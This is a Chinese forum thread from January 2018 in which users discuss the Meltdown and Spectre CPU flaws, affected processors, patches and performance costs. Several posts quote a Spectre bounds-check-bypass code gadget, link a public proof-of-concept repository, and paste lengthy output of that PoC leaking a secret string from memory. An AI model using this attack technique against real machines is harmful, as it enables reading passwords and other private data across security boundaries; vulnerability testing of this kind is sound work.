1
linux40 2018-01-04 09:07:15 +08:00
原来是两个 bug 吗。。。噩梦。。。
|
2
rogwan 2018-01-04 09:11:51 +08:00 via Android
还没搞清楚怎么钻进这个洞去,丧
|
3
lisonfan 2018-01-04 09:41:06 +08:00 1
|
4
joyqi 2018-01-04 09:43:09 +08:00
这是阴谋,妈蛋,逼着我们升级 cpu
|
5
ytlm 2018-01-04 09:43:50 +08:00
不明觉厉。
|
6
realpg 2018-01-04 09:44:00 +08:00 3
看看有没有牛逼国家要求召回 CPU …… 要求提供不损失性能的解决方案
|
7
dndx OP @realpg Intel 到现在也没承认他们的 CPU 有缺陷,说 KPTI 补丁是因为本身 CPU 就该这么用。
或者换句话说以前没有 KPTI 的时候有 30% 的性能提升是 bug。 明显在逃避责任,这才是 Linus 开喷的主要原因。 |
8
f2f2f 2018-01-04 09:49:36 +08:00 1
哈哈哈哈,不好意思之前牙膏给你们挤多了现在我想收回来一点 #滑稽
|
10
mmmyc 2018-01-04 09:55:07 +08:00 via Android
不是程序员的我还是不懂在说什么
|
11
realpg 2018-01-04 09:55:33 +08:00
|
12
QAPTEAWH 2018-01-04 09:56:43 +08:00 via iPhone
我怀疑是故意留的后门
|
13
Nin 2018-01-04 09:57:29 +08:00 4
"Spectre" bug 是几乎所有存在乱序执行和分支预测功能的处理器都有的,但危害不大,也难补。
"Meltdown" bug 是这次危险最严重的漏洞,这个漏洞在大部分的 intel 处理器和 ARM Cortex-A75 上都有。农企家的 AMD 处理器也有,其他部分 ARM 处理器也有,但不能完成全部攻击步骤。 |
14
ryd994 2018-01-04 10:01:02 +08:00 via Android
linus 就喷这些 workaround 是写死的,不能在编译时开关。
intel 你们现在把这个写死,是不是意思就是今后也不准备真正修复这个问题,而是准备用这个 works 继续自欺欺人下去。 |
18
evagreenworking 2018-01-04 10:12:23 +08:00 2
Speculative attack 影响目前所有操作系统 只要带网页浏览器 iOS 的 webkit 也要打补丁 我在想 QQ X5 怎么办
|
19
JackBlack2006 2018-01-04 10:14:01 +08:00
AMD 方面似乎 Ryzen 系列安全,FX 系列中枪,再之前的羿龙翼龙系安全?
@Nin |
20
KyonLi 2018-01-04 10:14:08 +08:00 1
Intel 及 AMD CPU 受 "Meltdown" bug 影响,可以跨特权级读取内存,这是 KPTI 修复的 bug,AMD 不受影响。
只有我没读懂这句话吗? |
21
JackBlack2006 2018-01-04 10:15:20 +08:00
|
22
dndx OP |
25
dndx OP |
26
leakless 2018-01-04 10:30:20 +08:00 2
后排 870 收 i7 8700k
|
28
leakless 2018-01-04 10:44:21 +08:00
@em84 8700 日元出 i7 8700k 是嘛...那我勉为其难的就收了吧...
被黑的风险我自己默默承担安全留给你...双赢~ |
29
ryd994 2018-01-04 11:02:36 +08:00 via Android
所以 8 代也不能幸免?
|
30
lrxiao 2018-01-04 11:05:36 +08:00
KPTI 对 spectre 无效吗?
|
31
lrxiao 2018-01-04 11:07:32 +08:00 1
@dndx ?这 google blog 写着 Spectre Variant 1 是 user 读 kernel Variant 2 能达到 VM 读宿主
|
32
lrxiao 2018-01-04 11:09:14 +08:00 1
@ryd994 一种说法是 Pentium Pro (1995)之后均有这个问题 也有说 Pentium 4 以后的 极少数豁免
|
33
dndx OP @lrxiao 参见 Spectre 论文的 1.1 Our Results。KPTI 据我的理解是修 Meltdown,对 Spectre 并没有通用的修复。
|
34
ryd994 2018-01-04 11:11:22 +08:00 via Android 9
|
35
zone53 2018-01-04 11:18:21 +08:00
所以新买的 mbp 要打折扣了么
|
36
gamexg 2018-01-04 11:26:11 +08:00
我为什么感觉第二个更严重?
浏览个网页结果被 js 把 keepasss 内存的密码给读取了? |
38
lrxiao 2018-01-04 11:35:44 +08:00
嗯 应该是的 我又上 reddit 上看了看
|
39
uyhyygyug1234 2018-01-04 11:38:59 +08:00
这个利用放出来了 ,能像上次 wannacry 这么再来一下。。。。。
|
40
xuanboyi 2018-01-04 11:44:33 +08:00 via iPhone 1
@zone53 https://9to5mac.com/2018/01/03/mac-fix-for-intel-kernel-bug/ Mac 去年 12 月的补丁就补过了,丝毫没有变慢
|
41
dndx OP @gamexg 是的,而且更尴尬的是 Spectre 无法容易的修复,Chrome 64 要推出的“修复”也只是把 performance.now 的精度降低,让 timing attack become less efficient。并不是从根本上解决问题。
这也是 Chrome 官方只将其称为 "temporary measure" 的原因。 |
42
privil 2018-01-04 12:04:03 +08:00
@xuanboyi #40 https://www.zhihu.com/question/265012502/answer/288724020 是因为 PCID ? 不过这个漏洞对个人用户影响不大,云厂商啥的比较大。阿里云已经预定 12 号升级了
|
44
Syaoran 2018-01-04 12:26:03 +08:00 2
小白表示看不懂
作为个人用户 如果让我选择 30%性能和安全 我选择 30%性能 |
45
dndx OP @gamexg 嗯,内存读取是无法直接用来提权,但是可以用作提权的 vector。
换句话说,如果你已经可以在 Ring 3 里用普通用户随便读取别的进程的数据了,提权也没什么必要了。毕竟提了权也就是能读这些东西而已。 |
46
winterbells 2018-01-04 12:52:07 +08:00
好像都没人提到联发科。。
|
47
Akkuman 2018-01-04 12:58:21 +08:00 via Android 1
@winterbells 提到了 arm,不包括吗?
|
48
rocksolid 2018-01-04 13:02:13 +08:00 1
@winterbells 联发科一样使用 arm 架构
|
49
ltux 2018-01-04 13:35:13 +08:00
"Why is this all done without any configuration options?",嘻嘻,这不跟 iPhone 降频一个球样么,without any options.
|
50
ltux 2018-01-04 13:36:55 +08:00 1
用在苹果身上毫无违和感。
Because I really see exactly two possibibilities: - Apple never intends to fix anything OR - these workarounds should have a way to disable them. |
51
eurokingbai2 2018-01-04 13:42:05 +08:00
难道没有人提到龙芯么?
|
52
VYSE 2018-01-04 13:53:29 +08:00 1
struct array {
unsigned long length; unsigned char data[]; }; struct array *arr1 = ...; /* small array */ struct array *arr2 = ...; /* array of size 0x400 */ /* >0x400 (OUT OF BOUNDS!) */ unsigned long untrusted_offset_from_caller = ...; if (untrusted_offset_from_caller < arr1->length) { unsigned char value = arr1->data[untrusted_offset_from_caller]; unsigned long index2 = ((value&1)*0x100)+0x200; if (index2 < arr2->length) { unsigned char value2 = arr2->data[index2]; } } 凡是预测执行可能导致 arr2->data[index2]进入 cache 的架构都是受 SPECTRE 影响的. |
53
iFlicker 2018-01-04 14:53:57 +08:00
@eurokingbai2 记得龙芯没有 x86 授权吧
|
54
eurokingbai2 2018-01-04 14:57:09 +08:00
@iFlicker 龙芯是 MIPS 指令集,整个流水线架构是自主研发的。
|
55
HuHui 2018-01-04 16:18:42 +08:00
突然想起《疯狂的硬盘》里的那个万能远程工具了。
|
56
zcljy 2018-01-04 16:35:20 +08:00 1
304 不锈钢盆(保证不漏)换各种 i5 i7 cpu,AMD 的兄弟抬下脚
|
57
BlueFly 2018-01-04 18:11:23 +08:00
没看懂,请问有没有漏洞攻击工具了?
|
59
VYSE 2018-01-04 19:07:56 +08:00
@BlueFly #57 test vulnerable 的 POC 有 https://github.com/Eugnis/spectre-attack
|
60
jaleo 2018-01-04 19:11:19 +08:00
所以国家一直在搞自主可控的处理器
前端时间还正式发布了首个自主可控的网络防火墙 |
61
bigphat 2018-01-04 19:40:46 +08:00
我试图向我爸妈一辈的人解释这个事情,这两个 BUG 可以像下面这样形容吗?
如果把数据比作钱,存储数据的空间比喻成银行 利用 Meltdown,可以让黑客偷去银行里面属于央行的钱。 利用 Spectre,可以让黑客偷取别人账户的钱。 |
63
redsonic 2018-01-04 23:03:42 +08:00
@VYSE linux 上实测带有 invariant tsc 的新处理器全中招,老的 core2 在__rdtscp 处非法指令,换成 rdtsc 能跑过,但基本不中招。牙膏厂只要弄个开关把 tsc 弄得模糊点应该可以应付过去 spectre 攻击。
新赛扬,core i: # /tmp/spectre-attack Putting 'The Magic Words are Squeamish Ossifrage.' in memory Reading 40 bytes: Reading at malicious_x = 0xffffffffffdfeb98... Success: 0x54=’ T ’ score=17 (second best: 0x05 score=6) Reading at malicious_x = 0xffffffffffdfeb99... Success: 0x68=’ h ’ score=17 (second best: 0x05 score=6) Reading at malicious_x = 0xffffffffffdfeb9a... Success: 0x65=’ e ’ score=2 Reading at malicious_x = 0xffffffffffdfeb9b... Success: 0x20=’ ’ score=2 Reading at malicious_x = 0xffffffffffdfeb9c... Success: 0x4D=’ M ’ score=2 Reading at malicious_x = 0xffffffffffdfeb9d... Success: 0x61=’ a ’ score=19 (second best: 0x00 score=6) Reading at malicious_x = 0xffffffffffdfeb9e... Success: 0x67=’ g ’ score=2 Reading at malicious_x = 0xffffffffffdfeb9f... Success: 0x69=’ i ’ score=2 Reading at malicious_x = 0xffffffffffdfeba0... Success: 0x63=’ c ’ score=125 (second best: 0x00 score=61) Reading at malicious_x = 0xffffffffffdfeba1... Success: 0x20=’ ’ score=2 Reading at malicious_x = 0xffffffffffdfeba2... Success: 0x57=’ W ’ score=2 Reading at malicious_x = 0xffffffffffdfeba3... Success: 0x6F=’ o ’ score=2 Reading at malicious_x = 0xffffffffffdfeba4... Success: 0x72=’ r ’ score=2 Reading at malicious_x = 0xffffffffffdfeba5... Success: 0x64=’ d ’ score=2 Reading at malicious_x = 0xffffffffffdfeba6... Success: 0x73=’ s ’ score=2 Reading at malicious_x = 0xffffffffffdfeba7... Success: 0x20=’ ’ score=97 (second best: 0x05 score=46) Reading at malicious_x = 0xffffffffffdfeba8... Success: 0x61=’ a ’ score=2 Reading at malicious_x = 0xffffffffffdfeba9... Success: 0x72=’ r ’ score=2 Reading at malicious_x = 0xffffffffffdfebaa... Success: 0x65=’ e ’ score=107 (second best: 0x00 score=50) Reading at malicious_x = 0xffffffffffdfebab... Success: 0x20=’ ’ score=2 Reading at malicious_x = 0xffffffffffdfebac... Success: 0x53=’ S ’ score=2 Reading at malicious_x = 0xffffffffffdfebad... Success: 0x71=’ q ’ score=2 Reading at malicious_x = 0xffffffffffdfebae... Success: 0x75=’ u ’ score=2 Reading at malicious_x = 0xffffffffffdfebaf... Success: 0x65=’ e ’ score=2 Reading at malicious_x = 0xffffffffffdfebb0... Success: 0x61=’ a ’ score=513 (second best: 0x00 score=255) Reading at malicious_x = 0xffffffffffdfebb1... Success: 0x6D=’ m ’ score=2 Reading at malicious_x = 0xffffffffffdfebb2... Success: 0x69=’ i ’ score=2 Reading at malicious_x = 0xffffffffffdfebb3... Success: 0x73=’ s ’ score=2 Reading at malicious_x = 0xffffffffffdfebb4... Success: 0x68=’ h ’ score=13 (second best: 0x00 score=5) Reading at malicious_x = 0xffffffffffdfebb5... Success: 0x20=’ ’ score=2 Reading at malicious_x = 0xffffffffffdfebb6... Success: 0x4F=’ O ’ score=17 (second best: 0x00 score=7) Reading at malicious_x = 0xffffffffffdfebb7... Success: 0x73=’ s ’ score=2 Reading at malicious_x = 0xffffffffffdfebb8... Success: 0x73=’ s ’ score=2 Reading at malicious_x = 0xffffffffffdfebb9... Success: 0x69=’ i ’ score=93 (second best: 0x00 score=45) Reading at malicious_x = 0xffffffffffdfebba... Success: 0x66=’ f ’ score=2 Reading at malicious_x = 0xffffffffffdfebbb... Success: 0x72=’ r ’ score=2 Reading at malicious_x = 0xffffffffffdfebbc... Success: 0x61=’ a ’ score=2 Reading at malicious_x = 0xffffffffffdfebbd... Success: 0x67=’ g ’ score=2 Reading at malicious_x = 0xffffffffffdfebbe... Success: 0x65=’ e ’ score=2 Reading at malicious_x = 0xffffffffffdfebbf... Success: 0x2E=’.’ score=251 (second best: 0x00 score=122) 老 core2,每次结果不一样,因为 tsc 不准,这是猜对最多的一次: #./spectre-attack 10 Putting 'The Magic Words are Squeamish Ossifrage.' in memory Reading 40 bytes: Reading at malicious_x = 0xffffffffffdfeb78... Success: 0x54=’ T ’ score=2 Reading at malicious_x = 0xffffffffffdfeb79... Success: 0x68=’ h ’ score=2 Reading at malicious_x = 0xffffffffffdfeb7a... Success: 0x65=’ e ’ score=6 Reading at malicious_x = 0xffffffffffdfeb7b... Success: 0x20=’ ’ score=2 Reading at malicious_x = 0xffffffffffdfeb7c... Success: 0x4D=’ M ’ score=1 Reading at malicious_x = 0xffffffffffdfeb7d... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeb7e... Success: 0x67=’ g ’ score=1 Reading at malicious_x = 0xffffffffffdfeb7f... Success: 0x69=’ i ’ score=1 Reading at malicious_x = 0xffffffffffdfeb80... Success: 0x63=’ c ’ score=2 Reading at malicious_x = 0xffffffffffdfeb81... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeb82... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeb83... Success: 0x6F=’ o ’ score=1 Reading at malicious_x = 0xffffffffffdfeb84... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeb85... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeb86... Success: 0x73=’ s ’ score=2 Reading at malicious_x = 0xffffffffffdfeb87... Success: 0x66=’ f ’ score=1 Reading at malicious_x = 0xffffffffffdfeb88... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeb89... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeb8a... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeb8b... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeb8c... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeb8d... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeb8e... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeb8f... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeb90... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeb91... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeb92... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeb93... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeb94... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeb95... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeb96... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeb97... Success: 0x73=’ s ’ score=2 Reading at malicious_x = 0xffffffffffdfeb98... Success: 0x00=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeb99... Success: 0x69=’ i ’ score=2 Reading at malicious_x = 0xffffffffffdfeb9a... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeb9b... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeb9c... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeb9d... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeb9e... Success: 0x65=’ e ’ score=1 Reading at malicious_x = 0xffffffffffdfeb9f... Success: 0xFF=’?’ score=0 |
67
cppgohan 2018-01-05 00:17:38 +08:00
|
68
qfdk 2018-01-05 01:36:09 +08:00 via iPhone
@bigphat 简单点 你买的新房子 用你家钥匙可以开整栋楼的门。。。 解决方案 安装防盗门。 后果导致回家开门的时候要多开一道门耽误了进门时间
|
69
mingl0280 2018-01-05 02:38:03 +08:00
打完补丁 VM 性能下降严重(写入掉了一半,读取掉了三分之一,仅 VM 环境)……
简直是 fuck intel …… |
70
lsmgeb89 2018-01-05 03:30:47 +08:00
Intel 至少得怎么补偿下客户吧,否则太不爽了。
|
71
fline 2018-01-05 04:13:13 +08:00
我想知道骁龙 845 有没有被波及,哈哈哈哈哈哈,想想都想笑。。
|
72
lightening 2018-01-05 04:18:56 +08:00
第一句话翻译错了,你自己再读读看……
|
73
stabc 2018-01-05 04:45:10 +08:00
谁能用通俗的话给我解释一下,这个"BUG “不打补丁修复的话,可能会在什么场景下遇到什么问题?
|
74
farseeraliens 2018-01-05 05:08:38 +08:00 via iPhone 3
@cppgohan dollar=cash=cache,
I=instruction Linus 的意思是 cpu 内建一个按 cpl 分桶的指令缓存,哪怕用这么土的方法达到前面一句话的 make sure...也行啊,都按 cpl 分开了肯定不能跨特权级了嘛……鬼知道人家硬件工程师是不是受限于成本才不这么干呢 |
75
mortal 2018-01-05 08:07:32 +08:00
|
77
alexyangjie 2018-01-05 10:18:28 +08:00 via iPhone
不知道如果 vps 的 host 打了补丁,VM 没打补丁的话,能否读取其他 VM 的数据
|
78
Loyalsoldier 2018-01-05 10:29:23 +08:00
所以到底哪个型号的 CPU 受影响?或者哪个型号的不受影响?
|
79
kaneg 2018-01-05 10:58:58 +08:00
怎么知道系统打了修正这几个问题的补丁? 包括 Windows 和 Linux 系统。
普通用户只有任人宰割了 |
81
eurokingbai2 2018-01-05 11:18:42 +08:00
@alexyangjie 当然不能。VM 的内存空间也是 host 内存空间的一部分,服从 host 内存管理。
|
82
eurokingbai2 2018-01-05 11:20:32 +08:00
@alexyangjie 如果 host 和 vm 都打了补丁,没准可以实现 double 的性能 debuff。。
|
84
kaneg 2018-01-05 12:09:55 +08:00 via iPhone
@eurokingbai2
如果是这样的话,主机打了 patch,vm 就不需要打了,否则性能损失更大。反之 vm 打了,主机不打,还是没用的。 如果以上推断正确,托管在 cloud 的 vps 是不是根本不需要打补丁,而是坐等厂商修复。 |
85
dndx OP @farseeraliens Intel 肯定不会这么做的,这一下指令缓存部分的电路复杂度直接 x4,感觉不大改架构很难做到。
|
86
gamexg 2018-01-05 15:24:57 +08:00
@mingl0280 #69 什么虚拟化方式?
我看 esxi 声称打完补丁后 esxi 不会出现性能下降,当然虚拟机内部还需要打自己的补丁,那个会照成性能下降。 Now, the big question … Will applying the patch slow down ESXi? The answer is no. All tests performed so far have shown that the patch has no measurable impact on ESXi. The virtualization specific performance impact of these mitigations should be negligible, if any. That said, depending on how guest OSes are fixed against those vulnerabilities may impact their own performance. Please check with the other respective OS vendors for more information. |
87
lslqtz 2018-01-05 16:16:45 +08:00 via iPhone
iDevice A 系 受影响吗
|
90
privil 2018-01-05 16:53:15 +08:00
@clino #89 有装杀毒软件,可以在恶意软件生效之前抓到吧,大厂商的软件已经开始修补漏洞了,保持更新,个人电脑性能损失不大,云厂商比较凄惨
|
91
egen 2018-01-05 17:09:38 +08:00 1
@lslqtz #87
苹果证实所有 Mac 和 iOS 设备都受到了 Meltdown 和 Spectre CPU 漏洞的影响 |
94
robinlovemaggie 2018-01-05 18:14:36 +08:00
“ Intel never intends to fix anything ”,哈哈,说的太对了。
|